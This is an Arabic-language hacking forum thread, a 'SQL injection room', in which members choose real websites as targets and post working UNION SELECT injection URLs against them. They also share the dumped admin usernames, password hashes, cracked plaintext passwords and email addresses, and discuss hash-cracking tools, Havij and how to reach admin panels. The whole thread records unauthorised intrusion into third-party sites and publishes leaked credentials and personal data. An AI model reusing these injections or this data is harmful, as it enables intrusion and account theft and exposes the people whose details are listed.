إجابة كاملة و موفقة هاته هي الحقنة المثالية بارك الله فيك أعجبكم الهدف ؟؟؟ لوول الله يسلمك اخي العزيز Syst3m-32 اي والله اعجبني هالموقع (كتر...

الحالة
مغلق و غير مفتوح للمزيد من الردود.
غرفة حقن قواعد البيانات {غرفة Sql }
إجابة كاملة و موفقة

هاته هي الحقنة المثالية

بارك الله فيك

أعجبكم الهدف ؟؟؟ لوول

الله يسلمك اخي العزيز Syst3m-32

اي والله اعجبني هالموقع (كتر منن)هههههه
مشكور
 

darkman.dz

New Member
غرفة حقن قواعد البيانات {غرفة Sql }
خرجت خارجا ل 3 ساعات ويبدو أنه فاتني الكثير من التشويق
 

darkman.dz

New Member
غرفة حقن قواعد البيانات {غرفة Sql }
الحقنة الكاملة + id
ههههههههههههههههههههه
للتأكد فقط
كود:
http://www.marmoon.com/pregames.php?id=-383 UNION SELECT 1,2,3,group_concat(id,0x3a,admin,0x3a,pass),5,6,7,8,9,10,11,12,13+from+admin--

وهاته الجداول التي وجدتها
كود:
ps_customer:passwd:cartnana
ps_customer:last_passwd_gen:cartnana
ps_employee:passwd:cartnana
ps_employee:last_passwd_gen:cartnana
ps_referrer:passwd:cartnana
admin:pass:marmoon
pm_config:mail_pass:melody16
pm_users:password:melody16
pm_users:new_password:melody16
wp_posts:post_password:nananature
wp_users:user_pass:nananature

وهذا العمود الذي طبقت عليه + الأعمدة التي فيه
كود:
 ************************
 ** admin:pass:marmoon **
 ************************
 admin:id:marmoon
 admin:admin:marmoon
 admin:pass:marmoon
وهذا الناتج الأخير
id= 1
admin = admin
pass=asdfgh

وننتظر الهدف الجديد
 

darkman.dz

New Member
غرفة حقن قواعد البيانات {غرفة Sql }
d4rK-h4ck3r
أحي العزيز ما فائدة هذا الأمر
كود:
concat(0x3a3a3a3a3a,Host,0x3a,User,0x3a,Password,0x3a3a3a3a3a)
هنا لماذا كتبت الرمز 0x3a3a3 مطول
+ أخي الكريم ما فائدة الأمر concat_ws و 0x3a في بداية الأمر بين المزدوجتين ولماذا كتب مرة واحدة
كود:
concat_ws(0x3a,id,user,parola)
وشكرا مقدما
 
غرفة حقن قواعد البيانات {غرفة Sql }
الله يعطيك العافية اخي ooooo_darkman_ooooo
على الحقنة
انا حاولت اخذ بيانات الأعضاء والايميلات وكانت النتيجة كالتالي:
اولا:
من الجدول pm_users:password:melody16
مع اضافة السيجما الى الاستغلال
الأعمدة:
pm_users:id:melody16
pm_users:username:melody16
pm_users:password:melody16
pm_users:name:melody16
pm_users:gender:melody16
pm_users:country:melody16
pm_users:reg_ip:melody16
pm_users:reg_date:melody16
pm_users:last_signin:melody16
pm_users:email:melody16
pm_users:favorite:melody16
pm_users:power:melody16
pm_users:about:melody16
pm_users:av

الحقنة: http://www.marmoon.com/pregames.php?id=-38 union select 1,2,3,group_concat(id,0x3a,username,0x3a,password,0x3a,email),5,6,7,8,9,10,11,12,13+from+melody16.pm_users--

وجدت عضوين في هذا الجدول (الغريب ان احدهما اسمه ادمن)!!
البيانات
الاول:
admin
91477f9990ca6e6727c3961b0f1ed7ec
your@email.com
binary98 كلمة السر بعد فك التشفير

الثاني: ( بات مان ) هههه
batman99
d8578edf8458ce06fbc5bb76a58c5ca4
emark.s@gmail.com
qwerty كلمة السر بعد فك التشفير
جربت فوت على الايميل بس مو نفس كلة السر
______________________
ثانبا:
من الجدول:wp_users:user_pass:nananature
من وضع السيجما في الرابط
الأعمدة:
wp_users:ID:nananature
wp_users:user_login:nananature
wp_users:user_pass:nananature
wp_users:user_nicename:nananature
wp_users:user_email:nananature
wp_users:user_url:nananature
wp_users:user_registered:nananature
wp_users:user_activation_key:nananature
wp_users:user_status:nananature
wp_users:display_name:nananature
wp_users:ID:wpdrama,wp

الحقنة: http://www.marmoon.com/pregames.php...,7,8,9,10,11,12,13+from+nananature.wp_users--

وجدت عضو واحد في الجدول وكمان اسمه ادمن!!!
البيانات:
admin
$P$B8ky.p7DHHXJj3UvebuboIyKiJ9IyS. اطن sh1
admin@nana-nature.com

اخيرا
لوحة التحكم
http://www.marmoon.com/admin
بس ما قبلت بيانات الادمن
(ياشباب والله بدنا حل لهذه المشكلة يعني صرت جايب ادمن كذا..... موقع بس ما يقبل يدخل لوحة الادارة بس الاعضاء بيدخلو معي للموقع وما بستفاد شي هههه)


بدي اعرف يعني كم ادمن في الموقع صارو 3... :a02:
والخير لقدام هههه
الله يعطيك العافية اخي والاخوة جميعهم.
smilies14
 
التعديل الأخير:

darkman.dz

New Member
غرفة حقن قواعد البيانات {غرفة Sql }
عبد الله ر
يعطيك الصحة أخي العزيز
جاري تقييمك على العمل اللذي تقوم به
 

TIKTAKram

New Member
غرفة حقن قواعد البيانات {غرفة Sql }
[align=center]شكرا أخي على المواقع

تم الحقن و لكن لدي ما أقوله

لا أعرف لماذا لا يمكن حقنهما يدويا

لأن عدد الأعمدة لا ينتهي يظهر كأن الثغرة مرقعة في الموقع الأول و لكن من خلال البرنامج يمكن حقنه

و هذه معلومات الموقع الأول :

الأدمن : admin

الباسوارد : $P$BfX83P0hDuIl3OXTM.44dGAATde1bB.

نوع التشفيرة : MD5/UNIX

و تقريبا هذا النوع يمكنك فكه من خلال التخمين أقصد من خلال البرامج مثل PasswordPro

لأنو لا توجد مواقع لفك هذا النوع من الهاش ( لم أرى بنفسي موقع يفعل هذا )

إيميل الأدمن : rob.veltman@touringcartimes.com

phpmyadmin : http://www.touringcartimes.com/phpmyadmin/

بالنسبة للموقع الثاني هناك حماية على السيرفر و لا أعرف كيف تمكنت أنت من حقنه

بالتوفيق[/align]
 

m0h@med

New Member
غرفة حقن قواعد البيانات {غرفة Sql }
d4rK-h4ck3r
أحي العزيز ما فائدة هذا الأمر
كود:
concat(0x3a3a3a3a3a,Host,0x3a,User,0x3a,Password,0x3a3a3a3a3a)
هنا لماذا كتبت الرمز 0x3a3a3 مطول
+ أخي الكريم ما فائدة الأمر concat_ws و 0x3a في بداية الأمر بين المزدوجتين ولماذا كتب مرة واحدة
كود:
concat_ws(0x3a,id,user,parola)
وشكرا مقدما

السلام عليكم أخي darkman
الرمز 0x3a هو عبارة عن فاصلة لكن عندما تضيف 0x3a3a تصبح فاصلتين و هكذا
exemple
concat(id,0x3a,passs)
resultat
admin:admin
mais si vous ajoutez 0x3a3a
concat(id,0x3a3a,passs)
resultat
admin::admin

بخصوص الاستعلام
concat_ws هو نفسه concat لكن بدل ما نكتب الفاصلة 0x3a وسط الاستغلال نضع _ws و الفاصلة في البداية
c'est t-a dire
concat_ws(0x3a,id,user,parola)
هي نفسها
concat(id,0x3a,user,0x3a,parola)

الى الأمام دائما....^_^
 
غرفة حقن قواعد البيانات {غرفة Sql }
[align=center]شكرا أخي على المواقع

تم الحقن و لكن لدي ما أقوله

لا أعرف لماذا لا يمكن حقنهما يدويا

لأن عدد الأعمدة لا ينتهي يظهر كأن الثغرة مرقعة في الموقع الأول و لكن من خلال البرنامج يمكن حقنه

و هذه معلومات الموقع الأول :

الأدمن : admin

الباسوارد : $P$BfX83P0hDuIl3OXTM.44dGAATde1bB.

نوع التشفيرة : MD5/UNIX

و تقريبا هذا النوع يمكنك فكه من خلال التخمين أقصد من خلال البرامج مثل PasswordPro

لأنو لا توجد مواقع لفك هذا النوع من الهاش ( لم أرى بنفسي موقع يفعل هذا )

إيميل الأدمن : rob.veltman@touringcartimes.com

phpmyadmin : http://www.touringcartimes.com/phpmyadmin/

بالنسبة للموقع الثاني هناك حماية على السيرفر و لا أعرف كيف تمكنت أنت من حقنه

بالتوفيق[/align]


[align=center]اعتذر هذه المرة وضعت المواقع وخرجت بدون التاكد بانها صالحة للحقن...
+
بالنسبة لوضع الاهداف انا اعتذر عن هذه المهمة
تقدر من الان انت والاخوة ان تحددو الاهداف الجديدة
تحياتي

[/align]
 

darkman.dz

New Member
غرفة حقن قواعد البيانات {غرفة Sql }
m0h@med شكرا أخي m0h@med على التوضيح
و الله أفدتني بخصوص concat_ws كثيرا
وكذلك رمز الفاصلتين يعني أحسن مانكتب 0x3a مرتين نكتبها 0x3a3a
 

darkman.dz

New Member
غرفة حقن قواعد البيانات {غرفة Sql }
[align=center]شكرا أخي على المواقع

تم الحقن و لكن لدي ما أقوله

لا أعرف لماذا لا يمكن حقنهما يدويا

لأن عدد الأعمدة لا ينتهي يظهر كأن الثغرة مرقعة في الموقع الأول و لكن من خلال البرنامج يمكن حقنه

و هذه معلومات الموقع الأول :

الأدمن : admin

الباسوارد : $P$BfX83P0hDuIl3OXTM.44dGAATde1bB.

نوع التشفيرة : MD5/UNIX

و تقريبا هذا النوع يمكنك فكه من خلال التخمين أقصد من خلال البرامج مثل PasswordPro

لأنو لا توجد مواقع لفك هذا النوع من الهاش ( لم أرى بنفسي موقع يفعل هذا )

إيميل الأدمن : rob.veltman@touringcartimes.com

phpmyadmin : http://www.touringcartimes.com/phpmyadmin/

بالنسبة للموقع الثاني هناك حماية على السيرفر و لا أعرف كيف تمكنت أنت من حقنه

بالتوفيق[/align]

هل حقنت الموقع الأول ب havij أخي system-32
 

darkman.dz

New Member
غرفة حقن قواعد البيانات {غرفة Sql }
تم تقييم كل من الإخوة
Master vbspiders
m0h@med
Syst3m-32
عبد الله ر
smilies12
:a04:




 

TIKTAKram

New Member
غرفة حقن قواعد البيانات {غرفة Sql }
الهدف الجديد​

كود:
www.imagesfestival.com

أخي الكريم هل حقنت أنت هذا الموقع ؟؟؟

لأنو إصدار القاعدة 4 و خمنت أكثر من 600 إسم للجدول و لا جدوى

إن كنت لم تحقنه يا غالي فتذكر ما قلنا لازم قبل أن نضع هدف أن نحقنه

ليس موقع لم نستطع حقنه نضعه، لأنو ممكن عضو جديد ما يقدر يحقن فيكره ال SQL

لكن لما نكون حقناه نعطيه الحل و يستفيد
 
التعديل الأخير:
غرفة حقن قواعد البيانات {غرفة Sql }
تم تقييم كل من الإخوة
Master vbspiders
m0h@med
Syst3m-32
عبد الله ر
SnipeR%20%2823%29.gif

:a04:​

مشكور اخي العزيز ooooo_darkman_ooooo
ولو هذا واجبنا
بالنسبة للموقع : www.imagesfestival.com
والله انا حاولت اخمن اسم الجدول بس ما طلع معي مع انني جربت كتتتتتيييير.....هههه
بس والله من رأي انك تضع جدول التخمين اللي بتشتغل انت عليه او الطريقة التي تستعملها ليستفاد منها الجميع ولكن بعد ان يحاول الجميع فيه ويجرب الكل عليه بالاول
مشكور على التقييم

بالنسبة للأخ Syst3m-32
ياريت تقلنا بأي برنامج حقنت الموقع
لاني بصراحة ما جربت استعمل اي برنامج للحقن قبل الان
الشي الوحيد اللي احيانا بستعملو هو شريط الهاك للفايرفوكس مشان الامر union select اذا كان عدد الاعمدة كتير ومشان تشفير كلمة %pass% فقط

ومن اجل ان اعرف القليل عن فائدة هذه البرامج وكيف تساعد في الاختراق

مشكووووور
 

TIKTAKram

New Member
غرفة حقن قواعد البيانات {غرفة Sql }
يا دارك لوول ليش ما قلت لي أنه WordPress ؟؟؟

جعلتني أظهر كأنني لم أستطع حقن الموقع لوول

تم الحقن بنجاح بعد معرفة السكربت WordPress لوول

إسم الجدول : wp_users

إسم عمود اليوزر : user_login

إسم عمود الباسوارد : user_pass

يوزر الأدمن : admin

باسوارده : $P$BKVumgDn3YBBmuENaVRIHGq9yEV1QN1

بالمناسبة الباسوارد مشفر تشفيرة MD5-WordPress

و هذه الحقنة كاملة :

كود:
 http://www.imagesfestival.com/volunteer.php?id=-6%20UNION%20SELECT%201,2,concat%28user_login,0x3a,user_pass%29,4,5,6,7,8+from+wp_users--

بالنسبة للوحة التحكم لو تتذكر يا دارك يا مشاكس كم حكينا عنها لوول تظهر لك أني نسيت الموقع ؟؟ هههه

بالتوفيق
 
الحالة
مغلق و غير مفتوح للمزيد من الردود.
أعلى